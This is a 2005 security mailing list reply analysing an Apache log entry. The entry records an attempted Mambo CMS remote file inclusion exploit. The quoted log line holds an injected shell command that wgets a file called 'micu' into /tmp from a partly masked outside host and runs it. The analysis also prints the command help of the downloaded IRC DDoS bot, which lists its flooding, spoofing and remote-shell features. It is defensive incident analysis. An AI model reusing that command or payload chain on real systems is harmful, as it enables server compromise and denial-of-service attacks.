[Dshield] Can Someone Decipher This Log Entry?

Stephane Grobety security at admin.fulgan.com
Thu Dec 22 10:30:34 GMT 2005


Hello David,

I've masked part of the IP you provided in your message, just in case
in case. It's a bit silly considering you didn't do the same, but,
well, it does no additional harm...

it looks like that this is an attempt to exploit a flaw in the Mambo
content management software (looks like it's this one:
http://secunia.com/advisories/14337/).

If the exploit succeeds, it will try to wget a file called "micu" from
XXX.136.48.69 into the /tmp folder and execute it.

At this moment, that server is still serving the file so I checked it.
What it does is try to download and execute two more files: "mare" and "ro"

"mare" isn't available on the remote server but "ro" is. it looks like
an ELF executable. Now, I'm not a specialist of that file format so
I may be completely wrong here but this looks like a Linux x86
executable file. It seems to link the /lib/ld-linux.so.2 library and
import a bunch of functions that you expect from a IP server program.
It also contains a number of strings that indicates that it might try
to contact an IRC server (*.undernet.org). It also has a nice internal
help that is probably intended to be used by the attacker:

NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI <target> <secs>
NOTICE %s :Tsunami heading for %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :MOVE <server>
NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder
NOTICE %s :NICK <nick>                                      = Changes the nick of the client
NOTICE %s :SERVER <server>                                  = Changes servers
NOTICE %s :GETSPOOFS                                        = Gets the current spoofing
NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet
NOTICE %s :DISABLE                                          = Disables all packeting from this client
NOTICE %s :ENABLE                                           = Enables all packeting from this client
NOTICE %s :KILL                                             = Kills the client
NOTICE %s :GET <http address> <save as>                     = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION                                          = Requests version of client
NOTICE %s :KILLALL                                          = Kills all current packeting
NOTICE %s :HELP                                             = Displays this
NOTICE %s :IRC <command>                                    = Sends this command to the server
NOTICE %s :SH <command>                                     = Executes a command
NOTICE %s :Killing pid %d.

So what this looks like is a client for a DDoS botnet.

Other entries in the program seems to indicate it's been compiled on a
Debian system:

/home/drow/debian-glibc/

There is also something that looks very much like an HTTP request:

GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

It would be interesting to see if the request matches your log entry:
I think the above request is part of the exploit code.

I did a bit of google research and found several DDoS client that are
apparently based on the same code that contains the same string
literals.

That's all I can say about this... The attacker is still up and
running and probably still scanning networks trying to drop it's
maleware.

Good luck,
Stephane


Wednesday, December 21, 2005, 10:53:14 PM, you wrote:

DCH> I have about 25 of these today. I've added index2.php to the firewall watcher.
DCH> I cannot make sense of this Apache print:

DCH> 85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"




-- 
Best regards,
 Stephane                            mailto:security at admin.fulgan.com



More information about the list mailing list